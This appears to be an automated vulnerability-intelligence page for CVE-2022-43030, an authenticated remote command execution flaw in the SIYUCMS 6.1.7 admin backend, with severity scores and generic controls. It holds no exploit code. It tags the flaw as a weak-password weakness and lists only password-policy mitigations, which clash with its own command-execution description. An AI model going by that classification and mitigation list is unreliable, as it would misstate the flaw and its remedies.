Cyber Resilience

CVE-2022-43030

HighPublic PoC

Published: 14 November 2022

Published
14 November 2022
Modified
01 May 2025
KEV Added
Patch
CVSS Score v3.1 7.2 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0236 85.3th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2022-43030 is a high-severity Weak Password Requirements (CWE-521) vulnerability in Siyucms Siyucms. Its CVSS base score is 7.2 (High).

Operationally, ranked in the top 14.7% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

Siyucms version 6.1.7 contains a remote code execution vulnerability in its administrative background interface. The affected software is SIYUCMS, a content management system built on ThinkPHP5 and AdminLTE, where the flaw permits execution of arbitrary commands through the management console.

An attacker who obtains valid administrative credentials can reach the vulnerable background functions over the network and run operating-system commands, resulting in full server compromise and privilege escalation. The CVSS 7.2 rating reflects that high privileges are required but that no user interaction is needed once access is obtained.

Public references consist of GitHub repositories that document the issue; no vendor advisory or official patch information is provided in the available sources. The associated EPSS score rose from a low baseline to a peak of 0.0504 in January 2025 before receding to its current value of 0.0236, indicating a measurable increase in observed exploitation interest after disclosure.

EU & UK References

Vulnerability details

Siyucms v6.1.7 was discovered to contain a remote code execution (RCE) vulnerability in the background. SIYUCMS is a content management system based on ThinkPaP5 AdminLTE. SIYUCMS has a background command execution vulnerability, which can be used by attackers to gain…

more

server privileges

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

siyucms
siyucms
6.1.7

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-521

Configuration settings can define and enforce strong password requirements to avoid weak policies.

addresses: CWE-521

IA policy establishes password requirements, directly addressing weak password requirements.

addresses: CWE-521

Ensuring authenticators have sufficient strength of mechanism for intended use addresses weak password requirements.

addresses: CWE-521

Organization-wide password and authentication policies are applied uniformly, preventing weak local password requirements.

addresses: CWE-521

Facilitated training and awareness of current practices improves definition and enforcement of sufficiently strong password requirements.

addresses: CWE-521

Dedicated security resources support deployment of strong authentication systems and enforcement of robust password policies.

addresses: CWE-521

Vulnerability scans assess password policies and weak credential requirements against benchmarks.

addresses: CWE-521

User documentation on maintaining security includes password requirements, directly mitigating weak password policies.

References